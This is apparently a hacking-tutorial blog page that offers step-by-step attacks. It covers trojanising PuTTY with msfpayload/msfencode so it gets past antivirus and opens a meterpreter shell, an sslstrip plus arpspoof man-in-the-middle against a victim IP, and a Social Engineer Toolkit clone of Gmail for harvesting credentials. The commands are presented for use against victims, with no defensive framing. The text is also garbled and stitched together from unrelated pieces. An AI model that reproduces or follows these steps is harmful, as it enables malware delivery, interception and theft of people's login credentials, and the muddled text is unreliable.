How to bypass internet security using msfpayload and mafencode
I have posted so many articles on windows hacking using metasploit,using trojan etc,
Today i m go no show u hack windows using putty.
1st u must encode putty for bypass antivirus using metasploit and than set payload in putty for connection to victim machine.
Now you send this encode putty file send to victim when victim open this tool than payload set connection between attacker machine to victim machine and encode is use for bypass antivirus so antivirus is not detect virus in putty.
You got meterpreter shell in your machine in metasploit so you do anythings in u r victim machine using meterpreter shell
You install trojan(netcat),u sniffing password (firefox,windows logon etc),u add new user account etc.
You might be interested in some of our other articles:
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
in my case iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777
this command is use for all traffic on 80 port is redirect to port number 7777
step 3 : now time to run sslstrip
path - /pentest/web/sslstrip
./sslstrip.py -l <listenPort> -w <txt file name >
in my case
sslstrip.py -l 7777 -w mitm
-w command - write all date in one txt file
step 4 : Dont close this terminal , open new terminal and run arpspoof of sniff data from the victim PC in network
Run arpspoof to convince a network they should send their traffic to you
arpspoof -i <interface> -t <targetIP> <gatewayIP>
in my case arpspoof -i eth1 -t 192.168.1.102 192.168.1.1
IN VICTIM machine
IF u r blind successfull command than u r victim pc ip table is changed by arpspoof
so u r sniff victim's data.
when victim access his/her gmail account
so his/her open gmail site but this gmail site is not real but it is look like real site . one one difference - real gamil site is HTTPS but this is HTTP .
When ur victim enter his/her facebook Credential in this fake gmail website, arpspoof sniff this Credential and ssl strip is read this and write in txt file in u r /pentest/web/sslstrip.
SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.
Social Engineer Toolkit (SET)-Credential Harvester Attack
step 1 : 1st open terminal and go to this following path
cd /pentext/exploit/set
and than enter
and type ./set for open Social Engineer Toolkit
IT's look like
step 2 : Select option 1 : Social-Engineering Attacks from the set toolkit menu
now in set toolkit the new menu is open
step 3 : Select option 2 : Website Attack Vectors
The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.
now in set toolkit the new menu is open
step 5 : Select option 2 : Site cloner
now in set toolkit the new menu is open
step 6 : Now u enter ur target URL which u want clone ex. https://gmail.com
than enter.
Now Credential Harvester is runing on port 80 A attacker PC is ready for attack .
now an URL you should give to your victim http://<u r ip address>/
in my case
http://192.168.1.103/
IN VICTIM PC
When u r victim enter this url http://192.168.1.103/ . web browser open gmail website but this is fake site made by SET toolkit..
When ur victim enter his/her gmail Credential in this fake website , than fake website send Credential to attacker PC..
You got ur victim gmail Credential..:D
- - - - - VIDEO TUTORIAL - - - - -
If u want to learn How to use Credential Harvester Attack over the internet than click here(Youtube Video with HD print) If you have any questions, Feel free to ask. :D
